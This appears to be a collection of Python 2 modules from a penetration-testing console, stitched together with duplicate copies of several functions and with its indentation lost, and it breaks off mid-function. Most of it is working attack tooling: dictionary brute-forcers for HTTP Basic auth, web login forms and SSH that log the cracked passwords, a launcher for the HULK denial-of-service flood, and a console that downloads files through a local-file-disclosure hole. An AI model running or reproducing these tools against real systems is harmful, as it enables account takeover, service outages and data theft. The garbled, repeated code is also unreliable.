def wuis(run):
try:
global defaulthost, defaultport
if run != 1:
actions = raw_input(d.prompt("web/whois"))
else:
actions = "run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target", "yes", "IP or DNS", defaulthost)
d.descrip("port", "no", "Port of target", defaultport)
d.space()
elif actions[0:10] == "set target":
defaulthost = defaulthost.replace("http://", "")
defaulthost = ping.update(defaulthost, actions, "target")
d.change("target", defaulthost)
elif actions[0:8] == "set port":
defaultport = ping.update(defaultport, actions, "port")
d.change("port", defaultport)
elif actions == "exit" or actions == "x":
d.goodbye()
exit()
elif actions == "help" or actions == "h":
help.help()
elif actions == "back" or actions == "b":
return
return
elif actions == "run" or actions == "r":
d.run()
try:
ping.live(defaulthost, defaultport)
if True:
try:
w = whois.whois(defaulthost)
if w:
wd = w.__dict__
for k, v in wd.items():
print('%20s\t"%s"' % (k, v))
print ""
except:
Errors.Errors(event=sys.exc_info(), info=False)
except:
Errors.Errors(event=sys.exc_info()[0],
info=defaulthost + ":" + defaultport)
else:
d.No_actions()
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
wuis(0)
def wuis(run):
try:
global defaulthost,defaultport
if run!=1:
actions=raw_input(d.prompt("web/whois"))
else:
actions="run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target","yes","IP or DNS",defaulthost)
d.descrip("port","no","Port of target",defaultport)
d.space()
elif actions[0:10] == "set target":
defaulthost=defaulthost.replace("http://", "")
defaulthost=ping.update(defaulthost,actions,"target")
d.change("target",defaulthost)
elif actions[0:8] == "set port":
defaultport=ping.update(defaultport,actions,"port")
d.change("port",defaultport)
elif actions=="exit" or actions=="x":
d.goodbye()
exit()
elif actions=="help" or actions=="h":
help.help()
elif actions=="back" or actions=="b":
return
return
elif actions=="run" or actions=="r":
d.run()
try:
ping.live(defaulthost,defaultport)
if True:
try:
w = whois.whois(defaulthost)
if w:
wd = w.__dict__
for k, v in wd.items():
print('%20s\t"%s"' % (k, v))
print ""
except:
Errors.Errors(event=sys.exc_info(), info=False)
except:
Errors.Errors(event=sys.exc_info()[0], info=defaulthost+":"+defaultport)
else:
d.No_actions()
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
wuis(0)
def wuis(run):
try:
global defaulthost,defaultport
if run!=1:
actions=raw_input(d.prompt("web/whois"))
else:
actions="run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target","yes","IP or DNS",defaulthost)
d.descrip("port","no","Port of target",defaultport)
print ""
elif actions[0:10] == "set target":
defaulthost = actions[11:]
d.change("target",defaulthost)
wuis(0)
elif actions=="exit" or actions=="x":
d.goodbye()
exit()
elif actions=="help" or actions=="h":
help.help()
elif actions=="back" or actions=="b":
return
return
elif actions=="run" or actions=="r":
d.run()
try:
ping.live(defaulthost,defaultport)
if True:
try:
w = whois.whois(defaulthost)
if w:
wd = w.__dict__
for k, v in wd.items():
print('%20s\t"%s"' % (k, v))
print ""
except(KeyboardInterrupt):
d.kbi()
exit()
except:
d.off()
else:
d.nocommand()
except:
d.kbi()
exit()
wuis(0)
def wuis(run):
try:
global defaulthost, defaultport
if run != 1:
actions = raw_input(d.prompt("web/whois"))
else:
actions = "run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target", "yes", "IP or DNS", defaulthost)
d.descrip("port", "no", "Port of target", defaultport)
print ""
elif actions[0:10] == "set target":
defaulthost = actions[11:]
d.change("target", defaulthost)
wuis(0)
elif actions == "exit" or actions == "x":
d.goodbye()
exit()
elif actions == "help" or actions == "h":
help.help()
elif actions == "back" or actions == "b":
return
return
elif actions == "run" or actions == "r":
d.run()
try:
ping.live(defaulthost, defaultport)
if True:
try:
w = whois.whois(defaulthost)
if w:
wd = w.__dict__
for k, v in wd.items():
print('%20s\t"%s"' % (k, v))
print ""
except (KeyboardInterrupt):
d.kbi()
exit()
except:
d.off()
else:
d.nocommand()
except:
d.kbi()
exit()
wuis(0)
def dosweb(run):
try:
global defaulthost,defaultport
if run!=1:
actions=raw_input(d.prompt("web/dos"))
else:
actions="run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target","yes","IP or DNS",defaulthost)
d.descrip("port","no","Port of target",defaultport)
print ""
elif actions[0:10] == "set target":
defaulthost = actions[11:]
defaulthost = defaulthost.replace("http://", "")
d.change("target",defaulthost)
dosweb(0)
elif actions[0:8] == "set port":
defaultport = actions[9:]
d.change("port",defaultport)
dosweb(0)
elif actions=="exit" or actions=="x":
d.goodbye()
exit()
elif actions=="help" or actions=="h":
help.help()
elif actions=="back" or actions=="b":
return
return
elif actions=="run" or actions=="r":
d.run()
try:
ping.live(defaulthost,defaultport)
if True:
try:
subprocess.call('python "files/hulk/hulk.py" http://'+defaulthost, shell=True)
except(KeyboardInterrupt):
d.kbi()
except:
d.off()
else:
d.nocommand()
except:
d.kbi()
exit()
dosweb(0)
def xjoomla(run):
try:
global defaulthost, defaultport
if run != 1:
actions = raw_input(d.prompt("web/joomscan"))
else:
actions = "run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target", "yes", "IP or DNS", defaulthost)
d.descrip("port", "no", "Port of target", defaultport)
print ""
elif actions[0:10] == "set target":
defaulthost = actions[11:]
d.change("target", defaulthost)
xjoomla(0)
elif actions == "exit" or actions == "x":
d.goodbye()
exit()
elif actions == "help" or actions == "h":
help.help()
elif actions == "back" or actions == "b":
return
return
elif actions == "run" or actions == "r":
d.run()
try:
ping.live(defaulthost, defaultport)
if True:
try:
subprocess.call(
'cd /usr/share/joomscan/;./joomscan.pl -u ' +
defaulthost,
shell=True)
except (KeyboardInterrupt):
d.kbi()
except:
d.off()
else:
d.nocommand()
except:
d.kbi()
exit()
xjoomla(0)
def xjoomla(run):
try:
global defaulthost, defaultport
if run != 1:
actions = raw_input(d.prompt("web/joomscan"))
else:
actions = "run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target", "yes", "IP or DNS", defaulthost)
d.descrip("port", "no", "Port of target", defaultport)
print ""
elif actions[0:10] == "set target":
defaulthost = actions[11:]
d.change("target", defaulthost)
xjoomla(0)
elif actions == "exit" or actions == "x":
d.goodbye()
exit()
elif actions == "help" or actions == "h":
help.help()
elif actions == "back" or actions == "b":
return
return
elif actions == "run" or actions == "r":
d.run()
try:
ping.live(defaulthost, defaultport)
if True:
try:
subprocess.call("cd /usr/share/joomscan/;./joomscan.pl -u " + defaulthost, shell=True)
except (KeyboardInterrupt):
d.kbi()
except:
d.off()
else:
d.nocommand()
except:
d.kbi()
exit()
xjoomla(0)
def httpbt(run):
try:
global defaulthost, defaultport, defaultpach, defaultuser, defaultdic2
if run != 1:
actions = raw_input(d.prompt("web/httpbt"))
else:
actions = "run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target", "yes", "IP or DNS", defaulthost)
d.descrip("port", "no", "Port of target", defaultport)
d.descrip("patch", "yes", "Folder or dir", defaultpach)
d.descrip("user", "yes", "Username", defaultuser)
d.descrip("dict_1", "yes", "Dictionary pass", defaultdic2)
print ""
elif actions[0:10] == "set target":
defaulthost = defaulthost.replace("http://", "")
defaulthost = ping.update(defaulthost, actions, "target")
d.change("target", defaulthost)
elif actions[0:8] == "set port":
defaultport = ping.update(defaultport, actions, "port")
d.change("port", defaultport)
elif actions[0:9] == "set patch":
defaultpach = ping.update(defaultpach, actions, "patch")
d.change("patch", defaultpach)
elif actions[0:8] == "set user":
defaultuser = ping.update(defaultuser, actions, "user")
d.change("user", defaultuser)
elif actions[0:10] == "set dict_1":
defaultdic2 = ping.update(defaultdic2, actions, "dict_1")
d.change("dict_1", defaultdic2)
elif actions == "exit" or actions == "x":
d.goodbye()
exit()
elif actions == "help" or actions == "h":
help.help()
elif actions == "back" or actions == "b":
return
elif actions == "run" or actions == "r":
d.run()
try:
ping.live(defaulthost, defaultport)
if True:
red = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
red.connect((defaulthost, int(defaultport)))
try:
d.loading_file()
try:
with open(defaultdic2, 'r') as passs:
for ps in passs:
ps = ps.replace("\n", "")
red.send("GET " + defaultpach +
" HTTP/1.1\r\n")
red.send("HOST: " + defaulthost + "\r\n")
red.send("Authorization:Basic " +
base64.b64encode(defaultuser +
":" + ps) +
"\r\n\r\n")
last = red.recv(1000)
if last.find("401") <= 0:
ping.savethree("BruteForceHTTP",
defaulthost,
defaultport,
defaultpach,
defaultuser, ps)
d.Success(defaultuser, ps)
red.close
httpbt(0)
else:
print " " + Alr + " Checking (username="******")(password="******")"
red.close
except:
Errors.Errors(event=sys.exc_info()[0],
info=defaultdic2)
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
except:
Errors.Errors(event=sys.exc_info()[0],
info=defaulthost + ":" + defaultport)
else:
d.No_actions()
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
httpbt(0)
def LFDconsole(run):
global defaulthost, defaultfile, defaultport
try:
if run != 1:
actions = raw_input(d.prompt("web/lfd-con"))
else:
actions = "run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target", "yes", "IP, DNS Target", defaulthost)
d.descrip("patch", "yes", "Path file vul", defaultfile)
d.descrip("port", "no", "Port service", defaultport)
d.space()
LFDconsole(0)
elif actions[0:9] == "set patch":
defaultfile = ping.update(defaultfile, actions, "patch")
d.change("patch", defaultfile)
elif actions[0:10] == "set target":
defaulthost = ping.update(defaulthost, actions, "target")
d.change("target", defaulthost)
elif actions[0:8] == "set port":
defaultport = ping.update(defaultport, actions, "port")
d.change("port", defaultport)
elif actions == "exit" or actions == "x":
d.goodbye()
exit()
elif actions == "help" or actions == "h":
help.help()
elif actions == "back" or actions == "b":
return
elif actions == "run" or actions == "r":
d.run()
try:
ping.live(defaulthost, defaultport)
if True:
connection = httplib.HTTPConnection(
defaulthost, defaultport)
connection.request("GET", defaultfile)
response = connection.getresponse()
if response.status == 200:
print " " + Suf + " File response correctly."
d.space()
print "\n " + Hlp + " LFD Console help\n"
print " ------------------------------------------"
print " |" + colors[6] + "Command " + colors[
0] + "| " + colors[6] + "Description" + colors[
0] + " | " + colors[6] + "Examples" + colors[
0] + " |"
print " ------------------------------------------"
print " | get | Download file | get index.php |"
print " ------------------------------------------"
d.space()
command = 0
while command != "exit":
command = raw_input(d.Client_prompt("LFD"))
if command[:3] == "get":
submit = command[4:]
try:
url = "http://" + defaulthost + defaultfile + "?" + submit
file_name = url.split('/')[-1]
u = urllib2.urlopen(url)
f = open("tmp/" + file_name, 'wb')
meta = u.info()
try:
file_size = int(
meta.getheaders("Content-Length")
[0])
if file_size != 0:
print " " + Alr + " Downloading %s Bytes: %s" % (
file_name, file_size)
file_size_dl = 0
block_sz = 8192
while True:
buffer = u.read(block_sz)
if not buffer:
break
file_size_dl += len(buffer)
f.write(buffer)
status = r"%10d [%3.2f%%]" % (
file_size_dl, file_size_dl
* 100. / file_size)
status = status + chr(8) * (
len(status) + 1)
print " " + Suf + " Completed " + status
f.close()
print " \n -------------------------------- File " + file_name + " Size: " + str(
file_size) + " \n"
os.system("cat 'tmp/" +
file_name +
"' -b -v ")
os.system("rm 'tmp/" +
file_name + "'")
print " \n -------------------------------- File " + file_name + " Size: " + str(
file_size) + " \n"
else:
print " " + War + " File empy or no exist."
except:
Errors.Errors(event=sys.exc_info(),
info=url)
except:
Errors.Errors(event=sys.exc_info(),
info=defaulthost + ":" +
defaultport)
else:
print " " + Bad + " File Not response correctly."
d.space()
except:
Errors.Errors(event=sys.exc_info(),
info=defaulthost + ":" + defaultport)
else:
d.No_actions()
except:
Errors.Errors(event=sys.exc_info(), info=False)
LFDconsole(0)
def httpformbasebruteforce(run):
try:
global defaulthost,defaultport,defaultpach,defaultdic1,defaultdic2,defaultdat1,defaultdat2,defaultmeth,defaultcont
if run!=1:
actions=raw_input(d.prompt("web/formbt"))
else:
actions="run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target","yes","IP or DNS",defaulthost)
d.descrip("port","no","Port of target",defaultport)
d.descrip("patch","yes","Folder or dir",defaultpach)
d.descrip("para_1","yes","Parameter 1",defaultdat1)
d.descrip("para_2","yes","Parameter 2",defaultdat2)
d.descrip("method","yes","POST or GET",defaultmeth)
d.descrip("condit","yes","[if!=]No Logged",defaultcont)
d.descrip("dict_1","yes","Dictionary user",defaultdic1)
d.descrip("dict_2","yes","Dictionary pass",defaultdic2)
print ""
elif actions[0:10] == "set target":
defaulthost = actions[11:]
defaulthost = defaulthost.replace("http://", "")
d.change("target",defaulthost)
httpformbasebruteforce(0)
elif actions[0:8] == "set port":
defaultport = actions[9:]
d.change("port",defaultport)
httpformbasebruteforce(0)
elif actions[0:9] == "set patch":
defaultpach = actions[10:]
d.change("patch",defaultpach)
httpformbasebruteforce(0)
elif actions[0:10] == "set condit":
defaultcont = actions[11:]
d.change("condit",defaultcont)
httpformbasebruteforce(0)
elif actions[0:10] == "set dict_1":
defaultdic1 = actions[11:]
d.change("dict_1",defaultdic1)
httpformbasebruteforce(0)
elif actions[0:10] == "set dict_2":
defaultdic2 = actions[11:]
d.change("dict_1",defaultdic2)
httpformbasebruteforce(0)
elif actions[0:10] == "set para_1":
defaultdat1 = actions[11:]
d.change("para_1",defaultdat1)
httpformbasebruteforce(0)
elif actions[0:10] == "set para_2":
defaultdat2 = actions[11:]
d.change("para_2",defaultdat2)
httpformbasebruteforce(0)
elif actions[0:10] == "set method":
defaultmeth = actions[11:]
d.change("method",defaultmeth)
httpformbasebruteforce(0)
elif actions=="exit" or actions=="x":
d.goodbye()
exit()
elif actions=="help" or actions=="h":
help.help()
elif actions=="back" or actions=="b":
return
return
elif actions=="run" or actions=="r":
d.run()
try:
ping.live(defaulthost,defaultport)
if True:
try:
d.loading()
try:
with open(defaultdic1,'r') as user:
for us in user:
try:
with open(defaultdic2,'r') as passs:
for ps in passs:
us=us.replace("\n","")
ps=ps.replace("\n","")
params = urllib.urlencode({defaultdat1: us, defaultdat2: ps})
header={"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"}
conn = httplib.HTTPConnection(defaulthost,defaultport)
conn.request(defaultmeth, defaultpach, params, header)
response = conn.getresponse()
ver_source = response.read()
if ver_source.find(defaultcont) != 0:
log=open('core/logs/logsBruteForce.log','a')
log.write('\n ===================================== ')
log.write('\n Module : BruteForceFormBase')
log.write('\n Data : '+time.strftime('%c'))
log.write('\n target : '+defaulthost)
log.write('\n path : '+defaultpach)
log.write('\n method : '+defaultmeth)
log.write('\n Cracked : ('+defaultdat1+' : '+us+' , '+defaultdat2+' : '+ps+')')
log.close()
print "\n-["+colors[2]+"*"+colors[0]+"] Successfully with ("+defaultdat1+"="+us+")("+defaultdat2+"="+ps+")\n"
httpformbasebruteforce(0)
else:
print " ["+colors[4]+"!"+colors[0]+"] Checking ("+defaultdat1+"="+us+")("+defaultdat2+"="+ps+")"
except:
d.filenot()
httpformbasebruteforce(0)
except:
d.filenot()
httpformbasebruteforce(0)
except:
d.kbi()
except:
d.off()
else:
d.nocommand()
except:
d.kbi()
exit()
httpformbasebruteforce(0)
def httpbt(run):
try:
global defaulthost,defaultport,defaultpach,defaultdic1,defaultdic2
if run!=1:
actions=raw_input(d.prompt("web/httpbt"))
else:
actions="run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target","yes","IP or DNS",defaulthost)
d.descrip("port","no","Port of target",defaultport)
d.descrip("patch","yes","Folder or dir",defaultpach)
d.descrip("dict_1","yes","Dictionary user",defaultdic1)
d.descrip("dict_2","yes","Dictionary pass",defaultdic2)
print ""
elif actions[0:10] == "set target":
defaulthost = actions[11:]
defaulthost = defaulthost.replace("http://", "")
d.change("target",defaulthost)
httpbt(0)
elif actions[0:8] == "set port":
defaultport = actions[9:]
d.change("port",defaultport)
httpbt(0)
elif actions[0:9] == "set patch":
defaultpach = actions[10:]
d.change("patch",defaultpach)
httpbt(0)
elif actions[0:10] == "set dict_1":
defaultdic1 = actions[11:]
d.change("dict_1",defaultdic1)
httpbt(0)
elif actions[0:10] == "set dict_2":
defaultdic2 = actions[11:]
d.change("dict_1",defaultdic2)
httpbt(0)
elif actions=="exit" or actions=="x":
d.goodbye()
exit()
elif actions=="help" or actions=="h":
help.help()
elif actions=="back" or actions=="b":
return
elif actions=="run" or actions=="r":
d.run()
try:
ping.live(defaulthost,defaultport)
if True:
red=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
red.connect((defaulthost, int(defaultport)))
try:
d.loading()
try:
with open(defaultdic1,'r') as user:
for us in user:
try:
with open(defaultdic2,'r') as passs:
for ps in passs:
us=us.replace("\n","")
ps=ps.replace("\n","")
red.send("GET "+defaultpach+" HTTP/1.1\r\n")
red.send("HOST: "+defaulthost+"\r\n")
red.send("Authorization:Basic "+base64.b64encode(us+":"+ps)+"\r\n\r\n")
last=red.recv(1000)
if last.find("401")<=0:
log=open('core/logs/logsBruteForce.log','a')
log.write('\n ===================================== ')
log.write('\n Module : BruteForceHTTP')
log.write('\n Data : '+time.strftime('%c'))
log.write('\n target : '+defaulthost)
log.write('\n port : '+defaultport)
log.write('\n patch : '+defaultpach)
log.write('\n Cracked : username : '******' , password : '+ps)
log.close()
d.sucess(us,ps)
red.close
httpbt(0)
else:
print " ["+colors[4]+"!"+colors[0]+"] Checking (username="******")(password="******")"
red.close
except:
d.filenot()
httpbt(0)
except:
d.filenot()
httpbt(0)
except:
d.kbi()
except:
d.off()
else:
d.nocommand()
except:
d.kbi()
exit()
httpbt(0)
def cmysql(run):
global defaulthost, defaultport, defaultuser, defaultpass
try:
if run != 1:
actions = raw_input(d.prompt("clt/sql"))
else:
actions = "run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target", "yes", "IP or DNS", defaulthost)
d.descrip("port", "no", "Port of target", defaultport)
d.descrip("user", "yes", "Username", defaultuser)
d.descrip("pass", "yes", "Password", defaultpass)
d.space()
cmysql(0)
elif actions[0:10] == "set target":
defaulthost = ping.update(defaulthost, actions, "target")
d.change("target", defaulthost)
elif actions[0:8] == "set port":
defaultport = ping.update(defaultport, actions, "port")
d.change("port", defaultport)
elif actions[0:8] == "set user":
defaultuser = ping.update(defaultuser, actions, "user")
d.change("user", defaultuser)
elif actions[0:8] == "set pass":
defaultpass = ping.update(defaultpass, actions, "pass")
d.change("pass", defaultpass)
elif actions == "exit" or actions == "x":
d.goodbye()
exit()
elif actions == "help" or actions == "h":
help.help()
elif actions == "back" or actions == "b":
return
elif actions == "run" or actions == "r":
d.run()
try:
ping.live(defaulthost, defaultport)
if True:
try:
con = MySQLdb.connect(defaulthost, defaultuser,
defaultpass, "")
if True:
try:
cmd = "nop"
print "\n " + Hlp + " SQL Client help\n"
print " -------------------------------------------------------------------------------------------------------"
print " |" + colors[6] + "Commd" + colors[
0] + " | " + colors[
6] + "Description" + colors[
0] + " | " + colors[
6] + "Examples" + colors[
0] + " |"
print " -------------------------------------------------------------------------------------------------------"
print " |show databases | list databases | show databases |"
print " |use | select database | use user_table |"
print " |show tables | list tables | show tables |"
print " |create database | create databases| create database USERS | "
print " |create table | create tables | create table EMAILS (id INT PRIMARY KEY, name VARCHAR(20)) | "
print " |drop database | drop databases | drop database USERS | "
print " |drop table | drop tables | drop table EMAIL | "
print " |insert | insert data | insert into EMAILS values ( '2', '*****@*****.**' ) | "
print " |update | update data | update EMAILS set name='Willy' where id=1 | "
print " |select | select data | select id, name from EMAILS | "
print " -------------------------------------------------------------------------------------------------------"
print ""
while (cmd != "exit"):
cmd = raw_input(d.Client_prompt('sql'))
cur = con.cursor()
try:
tor = cur.execute(cmd)
if True:
for x in range(tor):
print cur.fetchone()
except:
print " " + Bad + " No command '" + cmd + "' found"
except:
Errors.Errors(event=sys.exc_info()[0],
info=False)
except:
Errors.Errors(event=sys.exc_info(),
info=defaulthost + ":" + defaultport)
except:
Errors.Errors(event=sys.exc_info()[0],
info=defaulthost + ":" + defaultport)
else:
d.No_actions()
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
cmysql(0)
def httpformbasebruteforce(run):
try:
global defaulthost,defaultport,defaultpach,defaultdic1,defaultdic2,defaultdat1,defaultdat2,defaultmeth,defaultcont
if run!=1:
actions=raw_input(d.prompt("web/formbt"))
else:
actions="run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target","yes","IP or DNS",defaulthost)
d.descrip("port","no","Port of target",defaultport)
d.descrip("patch","yes","Folder or dir",defaultpach)
d.descrip("para_1","yes","Parameter 1",defaultdat1)
d.descrip("para_2","yes","Parameter 2",defaultdat2)
d.descrip("method","yes","POST or GET",defaultmeth)
d.descrip("condit","yes","[if!=]No Logged",defaultcont)
d.descrip("dict_1","yes","Dictionary user",defaultdic1)
d.descrip("dict_2","yes","Dictionary pass",defaultdic2)
print ""
elif actions[0:10] == "set target":
defaulthost = actions[11:]
defaulthost = defaulthost.replace("http://", "")
d.change("target",defaulthost)
httpformbasebruteforce(0)
elif actions[0:8] == "set port":
defaultport = actions[9:]
d.change("port",defaultport)
httpformbasebruteforce(0)
elif actions[0:9] == "set patch":
defaultpach = actions[10:]
d.change("patch",defaultpach)
httpformbasebruteforce(0)
elif actions[0:10] == "set condit":
defaultcont = actions[11:]
d.change("condit",defaultcont)
httpformbasebruteforce(0)
elif actions[0:10] == "set dict_1":
defaultdic1 = actions[11:]
d.change("dict_1",defaultdic1)
httpformbasebruteforce(0)
elif actions[0:10] == "set dict_2":
defaultdic2 = actions[11:]
d.change("dict_1",defaultdic2)
httpformbasebruteforce(0)
elif actions[0:10] == "set para_1":
defaultdat1 = actions[11:]
d.change("para_1",defaultdat1)
httpformbasebruteforce(0)
elif actions[0:10] == "set para_2":
defaultdat2 = actions[11:]
d.change("para_2",defaultdat2)
httpformbasebruteforce(0)
elif actions[0:10] == "set method":
defaultmeth = actions[11:]
d.change("method",defaultmeth)
httpformbasebruteforce(0)
elif actions=="exit" or actions=="x":
d.goodbye()
exit()
elif actions=="help" or actions=="h":
help.help()
elif actions=="back" or actions=="b":
return
return
elif actions=="run" or actions=="r":
d.run()
try:
ping.live(defaulthost,defaultport)
if True:
try:
d.loading()
try:
with open(defaultdic1,'r') as user:
for us in user:
try:
with open(defaultdic2,'r') as passs:
for ps in passs:
us=us.replace("\n","")
ps=ps.replace("\n","")
params = urllib.urlencode({defaultdat1: us, defaultdat2: ps})
header={"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"}
conn = httplib.HTTPConnection(defaulthost,defaultport)
conn.request(defaultmeth, defaultpach, params, header)
response = conn.getresponse()
ver_source = response.read()
if ver_source.find(defaultcont) != 0:
log=open('core/logs/logsBruteForce.log','a')
log.write('\n ===================================== ')
log.write('\n Module : BruteForceFormBase')
log.write('\n Data : '+time.strftime('%c'))
log.write('\n target : '+defaulthost)
log.write('\n path : '+defaultpach)
log.write('\n method : '+defaultmeth)
log.write('\n Cracked : ('+defaultdat1+' : '+us+' , '+defaultdat2+' : '+ps+')')
log.close()
print "\n-["+colors[2]+"*"+colors[0]+"] Successfully with ("+defaultdat1+"="+us+")("+defaultdat2+"="+ps+")\n"
httpformbasebruteforce(0)
else:
print " ["+colors[4]+"!"+colors[0]+"] Checking ("+defaultdat1+"="+us+")("+defaultdat2+"="+ps+")"
except:
d.filenot(defaultdic2)
httpformbasebruteforce(0)
except:
d.filenot(defaultdic1)
httpformbasebruteforce(0)
except:
d.kbi()
except:
d.off()
else:
d.nocommand()
except:
d.kbi()
exit()
httpformbasebruteforce(0)
def httpbt(run):
try:
global defaulthost, defaultport, defaultpach, defaultuser, defaultdic2
if run != 1:
actions = raw_input(d.prompt("web/httpbt"))
else:
actions = "run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target", "yes", "IP or DNS", defaulthost)
d.descrip("port", "no", "Port of target", defaultport)
d.descrip("patch", "yes", "Folder or dir", defaultpach)
d.descrip("user", "yes", "Username", defaultuser)
d.descrip("dict_1", "yes", "Dictionary pass", defaultdic2)
print ""
elif actions[0:10] == "set target":
defaulthost = defaulthost.replace("http://", "")
defaulthost = ping.update(defaulthost, actions, "target")
d.change("target", defaulthost)
elif actions[0:8] == "set port":
defaultport = ping.update(defaultport, actions, "port")
d.change("port", defaultport)
elif actions[0:9] == "set patch":
defaultpach = ping.update(defaultpach, actions, "patch")
d.change("patch", defaultpach)
elif actions[0:8] == "set user":
defaultuser = ping.update(defaultuser, actions, "user")
d.change("user", defaultuser)
elif actions[0:10] == "set dict_1":
defaultdic2 = ping.update(defaultdic2, actions, "dict_1")
d.change("dict_1", defaultdic2)
elif actions == "exit" or actions == "x":
d.goodbye()
exit()
elif actions == "help" or actions == "h":
help.help()
elif actions == "back" or actions == "b":
return
elif actions == "run" or actions == "r":
d.run()
try:
ping.live(defaulthost, defaultport)
if True:
red = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
red.connect((defaulthost, int(defaultport)))
try:
d.loading_file()
try:
with open(defaultdic2, "r") as passs:
for ps in passs:
ps = ps.replace("\n", "")
red.send("GET " + defaultpach + " HTTP/1.1\r\n")
red.send("HOST: " + defaulthost + "\r\n")
red.send(
"Authorization:Basic " + base64.b64encode(defaultuser + ":" + ps) + "\r\n\r\n"
)
last = red.recv(1000)
if last.find("401") <= 0:
ping.savethree(
"BruteForceHTTP", defaulthost, defaultport, defaultpach, defaultuser, ps
)
d.Success(defaultuser, ps)
red.close
httpbt(0)
else:
print " " + Alr + " Checking (username="******")(password="******")"
red.close
except:
Errors.Errors(event=sys.exc_info()[0], info=defaultdic2)
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
except:
Errors.Errors(event=sys.exc_info()[0], info=defaulthost + ":" + defaultport)
else:
d.No_actions()
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
httpbt(0)
def btssh(run):
try:
global defaulthost, defaultport, defaultuser, defaultdicc
if run != 1:
actions = raw_input(d.prompt("bt/ssh"))
else:
actions = "run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target", "yes", "IP or DNS", defaulthost)
d.descrip("port", "no", "Port of target", defaultport)
d.descrip("user", "yes", "Username", defaultuser)
d.descrip("dict_1", "yes", "Dictionary pass", defaultdicc)
print ""
btssh(0)
elif actions[0:10] == "set target":
defaulthost = actions[11:]
defaulthost = defaulthost.replace("http://", "")
d.change("target", defaulthost)
btssh(0)
elif actions[0:8] == "set port":
defaultport = actions[9:]
d.change("port", defaultport)
btssh(0)
elif actions[0:8] == "set user":
defaultuser = actions[9:]
d.change("user", defaultuser)
btssh(0)
elif actions[0:10] == "set dict_1":
defaultdicc = actions[11:]
d.change("dict_1", defaultdicc)
btssh(0)
elif actions == "exit" or actions == "x":
d.goodbye()
exit()
elif actions == "help" or actions == "h":
help.help()
elif actions == "back" or actions == "b":
return
return
elif actions == "run" or actions == "r":
d.run()
try:
ping.live(defaulthost, defaultport)
if True:
try:
d.loading()
try:
with open(defaultdicc, "r") as passs:
for ps in passs:
ps = ps.replace("\n", "")
try:
connect = pxssh.pxssh()
connect.login(defaulthost, defaultuser, ps)
if True:
ping.save("BruteForceSSH", defaulthost, defaultport, defaultuser, ps)
print "\n-" + Suf + " Successfully with (" + defaultuser + "=" + ps + ")\n"
return 1
except:
print " " + Alr + " Checking (" + defaultuser + "=" + ps + ")"
except:
d.filenot(defaultdicc)
btpop3(0)
except:
d.kbi()
except:
d.off()
else:
d.nocommand()
except:
d.kbi()
exit()
btssh(0)
def LFDconsole(run):
global defaulthost,defaultfile,defaultport
try:
if run!=1:
actions=raw_input(d.prompt("web/lfd-con"))
else:
actions="run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target","yes","IP, DNS Target",defaulthost)
d.descrip("patch","yes","Path file vul",defaultfile)
d.descrip("port","no","Port service",defaultport)
d.space()
LFDconsole(0)
elif actions[0:9] == "set patch":
defaultfile=ping.update(defaultfile,actions,"patch")
d.change("patch",defaultfile)
elif actions[0:10] == "set target":
defaulthost=ping.update(defaulthost,actions,"target")
d.change("target",defaulthost)
elif actions[0:8] == "set port":
defaultport=ping.update(defaultport,actions,"port")
d.change("port",defaultport)
elif actions=="exit" or actions=="x":
d.goodbye()
exit()
elif actions=="help" or actions=="h":
help.help()
elif actions=="back" or actions=="b":
return
elif actions=="run" or actions=="r":
d.run()
try:
ping.live(defaulthost,defaultport)
if True:
connection = httplib.HTTPConnection(defaulthost,defaultport)
connection.request("GET",defaultfile)
response = connection.getresponse()
if response.status == 200:
print " "+Suf+" File response correctly."
d.space()
print "\n "+Hlp+" LFD Console help\n"
print " ------------------------------------------"
print " |"+colors[6]+"Command "+colors[0]+"| "+colors[6]+"Description"+colors[0]+" | "+colors[6]+"Examples"+colors[0]+" |"
print " ------------------------------------------"
print " | get | Download file | get index.php |"
print " ------------------------------------------"
d.space()
command=0
while command!="exit":
command=raw_input(d.Client_prompt("LFD"))
if command[:3] == "get":
submit=command[4:]
try:
url = "http://"+defaulthost+defaultfile+"?"+submit
file_name = url.split('/')[-1]
u = urllib2.urlopen(url)
f = open("tmp/"+file_name, 'wb')
meta = u.info()
try:
file_size = int(meta.getheaders("Content-Length")[0])
if file_size != 0:
print " "+Alr+" Downloading %s Bytes: %s" % (file_name, file_size)
file_size_dl = 0
block_sz = 8192
while True:
buffer = u.read(block_sz)
if not buffer:
break
file_size_dl += len(buffer)
f.write(buffer)
status = r"%10d [%3.2f%%]" % (file_size_dl, file_size_dl * 100. / file_size)
status = status + chr(8)*(len(status)+1)
print " "+Suf+" Completed "+status
f.close()
print " \n -------------------------------- File "+file_name+" Size: "+str(file_size)+" \n"
os.system("cat 'tmp/"+file_name+"' -b -v ")
os.system("rm 'tmp/"+file_name+"'")
print " \n -------------------------------- File "+file_name+" Size: "+str(file_size)+" \n"
else:
print " "+War+" File empy or no exist."
except:
Errors.Errors(event=sys.exc_info(), info=url)
except:
Errors.Errors(event=sys.exc_info(), info=defaulthost+":"+defaultport)
else:
print " "+Bad+" File Not response correctly."
d.space()
except:
